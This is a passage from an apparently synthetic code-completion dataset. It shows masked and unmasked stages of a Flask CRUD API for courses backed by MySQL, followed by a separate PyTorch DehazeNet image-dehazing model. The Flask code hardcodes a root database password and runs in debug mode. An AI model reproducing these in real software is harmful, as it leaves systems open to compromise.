db.session.delete(cursoDelete)\n db.session.commit()\n return curso_Schema.jsonify(cursoDelete)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass curso(db.Model):\n idcurso = db.Column(db.Integer, primary_key=True)\n nombre_curso = db.Column(db.String(45))\n precio = db.Column(db.Integer)\n\n def __init__(self, nombre, precio):\n self.nombre_curso = nombre\n self.precio = precio\n\n\n<mask token>\n\n\nclass CursoSchema(ma.Schema):\n\n\n class Meta:\n fields = 'idcurso', 'nombre_curso', 'precio'\n\n\n<mask token>\n\n\[email protected]('/', methods=['GET'])\ndef index():\n return jsonify({'message': 'Academia'})\n\n\[email protected]('/cursos', methods=['POST'])\ndef create_curso():\n nombre_curso = request.json['nombre_curso']\n precio = request.json['precio']\n new_Curso = curso(nombre_curso, precio)\n db.session.add(new_Curso)\n db.session.commit()\n return curso_Schema.jsonify(new_Curso)\n\n\[email protected]('/cursos', methods=['GET'])\ndef get_cursos():\n all_cursos = curso.query.all()\n result = cursos_Schema.dump(all_cursos)\n return jsonify(result)\n\n\[email protected]('/cursos/<id>', methods=['GET'])\ndef get_task(id):\n cursoGet = curso.query.get(id)\n return curso_Schema.jsonify(cursoGet)\n\n\[email protected]('/cursos/<id>', methods=['PUT'])\ndef update_curso(id):\n cursoUpdate = curso.query.get(id)\n nombre = request.json['nombre_curso']\n precio = request.json['precio']\n cursoUpdate.nombre_curso = nombre\n cursoUpdate.precio = precio\n db.session.commit()\n return curso_Schema.jsonify(cursoUpdate)\n\n\[email protected]('/cursos/<id>', methods=['DELETE'])\ndef delete_item(id):\n cursoDelete = curso.query.get(id)\n db.session.delete(cursoDelete)\n db.session.commit()\n return curso_Schema.jsonify(cursoDelete)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass curso(db.Model):\n idcurso = db.Column(db.Integer, primary_key=True)\n nombre_curso = db.Column(db.String(45))\n precio = db.Column(db.Integer)\n\n def __init__(self, nombre, precio):\n self.nombre_curso = nombre\n self.precio = precio\n\n\ndb.create_all()\n\n\nclass CursoSchema(ma.Schema):\n\n\n class Meta:\n fields = 'idcurso', 'nombre_curso', 'precio'\n\n\n<mask token>\n\n\[email protected]('/', methods=['GET'])\ndef index():\n return jsonify({'message': 'Academia'})\n\n\[email protected]('/cursos', methods=['POST'])\ndef create_curso():\n nombre_curso = request.json['nombre_curso']\n precio = request.json['precio']\n new_Curso = curso(nombre_curso, precio)\n db.session.add(new_Curso)\n db.session.commit()\n return curso_Schema.jsonify(new_Curso)\n\n\[email protected]('/cursos', methods=['GET'])\ndef get_cursos():\n all_cursos = curso.query.all()\n result = cursos_Schema.dump(all_cursos)\n return jsonify(result)\n\n\[email protected]('/cursos/<id>', methods=['GET'])\ndef get_task(id):\n cursoGet = curso.query.get(id)\n return curso_Schema.jsonify(cursoGet)\n\n\[email protected]('/cursos/<id>', methods=['PUT'])\ndef update_curso(id):\n cursoUpdate = curso.query.get(id)\n nombre = request.json['nombre_curso']\n precio = request.json['precio']\n cursoUpdate.nombre_curso = nombre\n cursoUpdate.precio = precio\n db.session.commit()\n return curso_Schema.jsonify(cursoUpdate)\n\n\[email protected]('/cursos/<id>', methods=['DELETE'])\ndef delete_item(id):\n cursoDelete = curso.query.get(id)\n db.session.delete(cursoDelete)\n db.session.commit()\n return curso_Schema.jsonify(cursoDelete)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n",
"step-4": "from flask import Flask, json, request, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_marshmallow import Marshmallow\nimport warnings\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'\n ] = 'mysql+pymysql://root:1234@localhost/escuela'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\nma = Marshmallow(app)\n\n\nclass curso(db.Model):\n idcurso = db.Column(db.Integer, primary_key=True)\n nombre_curso = db.Column(db.String(45))\n precio = db.Column(db.Integer)\n\n def __init__(self, nombre, precio):\n self.nombre_curso = nombre\n self.precio = precio\n\n\ndb.create_all()\n\n\nclass CursoSchema(ma.Schema):\n\n\n class Meta:\n fields = 'idcurso', 'nombre_curso', 'precio'\n\n\ncurso_Schema = CursoSchema()\ncursos_Schema = CursoSchema(many=True)\n\n\[email protected]('/', methods=['GET'])\ndef index():\n return jsonify({'message': 'Academia'})\n\n\[email protected]('/cursos', methods=['POST'])\ndef create_curso():\n nombre_curso = request.json['nombre_curso']\n precio = request.json['precio']\n new_Curso = curso(nombre_curso, precio)\n db.session.add(new_Curso)\n db.session.commit()\n return curso_Schema.jsonify(new_Curso)\n\n\[email protected]('/cursos', methods=['GET'])\ndef get_cursos():\n all_cursos = curso.query.all()\n result = cursos_Schema.dump(all_cursos)\n return jsonify(result)\n\n\[email protected]('/cursos/<id>', methods=['GET'])\ndef get_task(id):\n cursoGet = curso.query.get(id)\n return curso_Schema.jsonify(cursoGet)\n\n\[email protected]('/cursos/<id>', methods=['PUT'])\ndef update_curso(id):\n cursoUpdate = curso.query.get(id)\n nombre = request.json['nombre_curso']\n precio = request.json['precio']\n cursoUpdate.nombre_curso = nombre\n cursoUpdate.precio = precio\n db.session.commit()\n return curso_Schema.jsonify(cursoUpdate)\n\n\[email protected]('/cursos/<id>', methods=['DELETE'])\ndef delete_item(id):\n cursoDelete = curso.query.get(id)\n db.session.delete(cursoDelete)\n db.session.commit()\n return curso_Schema.jsonify(cursoDelete)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n",
"step-5": "from flask import Flask, json, request, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_marshmallow import Marshmallow\nimport warnings\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://root:1234@localhost/escuela'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS']=False\n\ndb = SQLAlchemy(app)\nma = Marshmallow(app)\n\nclass curso(db.Model):\n idcurso = db.Column(db.Integer, primary_key=True)\n nombre_curso = db.Column(db.String(45))\n precio = db.Column(db.Integer)\n\n def __init__(self, nombre, precio):\n self.nombre_curso = nombre\n self.precio = precio\n\ndb.create_all()\n\nclass CursoSchema(ma.Schema):\n class Meta:\n fields = ('idcurso','nombre_curso','precio')\n\ncurso_Schema = CursoSchema()\ncursos_Schema = CursoSchema(many=True)\n\[email protected]('/',methods=['GET'])\ndef index():\n return jsonify({'message': 'Academia'})\n\[email protected]('/cursos', methods=['POST'])\ndef create_curso():\n nombre_curso = request.json['nombre_curso']\n precio = request.json['precio']\n\n new_Curso = curso(nombre_curso,precio)\n db.session.add(new_Curso)\n db.session.commit()\n\n return curso_Schema.jsonify(new_Curso)\n\[email protected]('/cursos',methods=['GET'])\ndef get_cursos():\n all_cursos = curso.query.all()\n result =cursos_Schema.dump(all_cursos)\n return jsonify(result)\n\[email protected]('/cursos/<id>', methods=['GET'])\ndef get_task(id):\n cursoGet = curso.query.get(id)\n return curso_Schema.jsonify(cursoGet)\n\[email protected]('/cursos/<id>', methods=['PUT'])\ndef update_curso(id):\n cursoUpdate=curso.query.get(id)\n nombre = request.json['nombre_curso']\n precio = request.json['precio']\n\n cursoUpdate.nombre_curso = nombre\n cursoUpdate.precio = precio\n\n db.session.commit()\n return curso_Schema.jsonify(cursoUpdate)\n\[email protected]('/cursos/<id>',methods=['DELETE'])\ndef delete_item(id):\n cursoDelete = curso.query.get(id)\n db.session.delete(cursoDelete)\n db.session.commit()\n\n return curso_Schema.jsonify(cursoDelete)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)",
"step-ids": [
9,
10,
11,
13,
14
]
}
|
[
9,
10,
11,
13,
14
] |
import torch
import torch.nn as nn
class DehazeNet(nn.Module):
def __init__(self, input=16, groups=4):
super(DehazeNet, self).__init__()
self.conv1 = nn.Conv2d(in_channels=3, out_channels=16, kernel_size=5)
self.relu1 = nn.ReLU()
self.conv2 = nn.Conv2d(in_channels=4, out_channels=16, kernel_size=3, padding=1)
self.relu2 = nn.ReLU()
self.conv3 = nn.Conv2d(in_channels=4, out_channels=16, kernel_size=5, padding=2)
self.relu3 = nn.ReLU()
self.conv4 = nn.Conv2d(in_channels=4, out_channels=16, kernel_size=7, padding=3)
self.relu4 = nn.ReLU()
self.maxpool = nn.MaxPool2d(kernel_size=7, stride=1)
self.conv5 = nn.Conv2d(in_channels=48, out_channels=1, kernel_size=6)
def forward(self, x):
#feature extraction
out = self.conv1(x)
out = self.relu1(out)
#maxout
max_1 = torch.max(out[:,0:4,:,:],out[:,4:8,:,:])
max_2 = torch.max(out[:,8:12,:,:],out[:,12:16,:,:])
out = torch.max(max_1,max_2)
#multi-scale Mapping
out1 = self.conv2(out)
out1 = self.relu2(out1)
out2 = self.conv3(out)
out2 = self.relu3(out2)
out3 = self.conv4(out)
out3 = self.relu4(out3)
y = torch.cat((out1,out2,out3), dim=1)
#Local Extremum
y = self.maxpool(y)
#non-linear Regression
y = self.conv5(y)
y = torch.max(y, torch.zeros(y.shape[0],y.shape[1],y.shape[2],y.shape[3]).cuda())
y = torch.min(y, torch.ones(y.shape[0],y.shape[1],y.shape[2],y.shape[3]).cuda())
return y
|
normal
|
{
"blob_id": "a8cf8d0965cb877d50cee403fbc30f27484f4f36",
"index": 8201,
"step-1": "<mask token>\n\n\nclass DehazeNet(nn.Module):\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass DehazeNet(nn.Module):\n\n def __init__(self, input=16, groups=4):\n super(DehazeNet, self).__init__()\n self.conv1 = nn.Conv2d(in_channels=3, out_channels=16, kernel_size=5)\n self.relu1 = nn.ReLU()\n self.conv2 = nn.Conv2d(in_channels=4, out_channels=16, kernel_size=\n 3, padding=1)\n self.relu2 = nn.ReLU()\n self.conv3 = nn.Conv2d(in_channels=4, out_channels=16, kernel_size=\n 5, padding=2)\n self.relu3 = nn.ReLU()\n self.conv4 = nn.Conv2d(in_channels=4, out_channels=16, kernel_size=\n 7, padding=3)\n self.relu4 = nn.ReLU()\n self.maxpool = nn.MaxPool2d(kernel_size=7, stride=1)\n self.conv5 = nn.Conv2d(in_channels=48, out_channels=1, kernel_size=6)\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass DehazeNet(nn.Module):\n\n def __init__(self, input=16, groups=4):\n super(DehazeNet, self).__init__()\n self.conv1 = nn.Conv2d(in_channels=3, out_channels=16, kernel_size=5)\n self.relu1 = nn.ReLU()\n self.conv2 = nn.Conv2d(in_channels=4, out_channels=16, kernel_size=\n 3, padding=1)\n self.relu2 = nn.ReLU()\n self.conv3 = nn.Conv2d(in_channels=4, out_channels=16, kernel_size=\n 5, padding=2)\n self.relu3 = nn.ReLU()\n self.conv4 = nn.Conv2d(in_channels=4, out_channels=16, kernel_size=\n 7, padding=3)\n self.relu4 = nn.ReLU()\n self.maxpool = nn.MaxPool2d(kernel_size=7, stride=1)\n self.conv5 = nn.Conv2d(in_channels=48, out_channels=1, kernel_size=6)\n\n def forward(self, x):\n out = self.conv1(x)\n out = self.relu1(out)\n max_1 = torch.max(out[:, 0:4, :, :], out[:, 4:8, :, :])\n max_2 = torch.max(out[:, 8:12, :, :], out[:, 12:16, :, :])\n out = torch.max(max_1, max_2)\n out1 = self.conv2(out)\n out1 = self.relu2(out1)\n out2 = self.conv3(out)\n out2 = self.relu3(out2)\n out3 = self.conv4(out)\n out3 = self.relu4(out3)\n y = torch.cat((out1, out2, out3), dim=1)\n y = self.maxpool(y)\n y = self.conv5(y)\n y = torch.max(y, torch.zeros(y.shape[0], y.shape[1], y.shape[2], y.\n shape[3]).cuda())\n y = torch.min(y, torch.ones(y.shape[0], y.shape[1], y.shape[2], y.\n shape[3]).cuda())\n return y\n",
"step-4": "import torch\nimport torch.nn as nn\n\n\nclass DehazeNet(nn.Module):\n\n def __init__(self, input=16, groups=4):\n super(DehazeNet, self).__init__()\n self.conv1 = nn.Conv2d(in_channels=3, out_channels=16, kernel_size=5)\n self.relu1 = nn.ReLU()\n self.conv2 = nn.Conv2d(in_channels=4, out_channels=16, kernel_size=\n 3, padding=1)\n self.relu2 = nn.ReLU()\n self.conv3 = nn.Conv2d(in_channels=4, out_channels=16, kernel_size=\n 5, padding=2)\n self.relu3 = nn.ReLU()\n self.conv4 = nn.Conv2d(in_channels=4, out_channels=16, kernel_size=\n 7, padding=3)\n self.relu4 = nn.ReLU()\n self.maxpool = nn.MaxPool2d(kernel_size=7, stride=1)\n self.conv5 = nn.Conv2d(in_channels=48, out_channels=1, kernel_size=6)\n\n def forward(self, x):\n out = self.conv1(x)\n out = self.relu1(out)\n max_1 = torch.max(out[:, 0:4, :, :], out[:, 4:8, :, :])\n max_2 = torch.max(out[:, 8:12, :, :], out[:, 12:16, :, :])\n out = torch.max(max_1, max_2)\n out1 = self.conv2(out)\n out1 = self.relu2(out1)\n out2 = self.conv3(out)\n out2 = self.relu3(out2)\n out3 = self.conv4(out)\n out3 = self.relu4(out3)\n y = torch.cat((out1, out2, out3), dim=1)\n y = self.maxpool(y)\n y = self.conv5(y)\n y = torch.max(y, torch.zeros(y.shape[0], y.shape[1], y.shape[2], y.\n shape[3]).cuda())\n y = torch.min(y, torch.ones(y.shape[0], y.shape[1], y.shape[2], y.\n shape[3]).cuda())\n return y\n",
"step-5": "import torch\nimport torch.nn as nn\n\nclass DehazeNet(nn.Module):\n def __init__(self, input=16, groups=4):\n super(DehazeNet, self).__init__()\n\n self.conv1 = nn.Conv2d(in_channels=3, out_channels=16, kernel_size=5)\n self.relu1 = nn.ReLU()\n\n self.conv2 = nn.Conv2d(in_channels=4, out_channels=16, kernel_size=3, padding=1)\n self.relu2 = nn.ReLU()\n self.conv3 = nn.Conv2d(in_channels=4, out_channels=16, kernel_size=5, padding=2)\n self.relu3 = nn.ReLU()\n self.conv4 = nn.Conv2d(in_channels=4, out_channels=16, kernel_size=7, padding=3)\n self.relu4 = nn.ReLU()\n self.maxpool = nn.MaxPool2d(kernel_size=7, stride=1)\n self.conv5 = nn.Conv2d(in_channels=48, out_channels=1, kernel_size=6)\n \n \n def forward(self, x):\n #feature extraction\n out = self.conv1(x)\n out = self.relu1(out)\n #maxout\n max_1 = torch.max(out[:,0:4,:,:],out[:,4:8,:,:])\n max_2 = torch.max(out[:,8:12,:,:],out[:,12:16,:,:])\n out = torch.max(max_1,max_2)\n\n #multi-scale Mapping\n out1 = self.conv2(out)\n out1 = self.relu2(out1)\n out2 = self.conv3(out)\n out2 = self.relu3(out2)\n out3 = self.conv4(out)\n out3 = self.relu4(out3)\n y = torch.cat((out1,out2,out3), dim=1)\n #Local Extremum\n y = self.maxpool(y)\n #non-linear Regression\n y = self.conv5(y)\n y = torch.max(y, torch.zeros(y.shape[0],y.shape[1],y.shape[2],y.shape[3]).cuda())\n y = torch.min(y, torch.ones(y.shape[0],y.shape[1],y.shape[2],y.shape[3]).cuda())\n return y",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |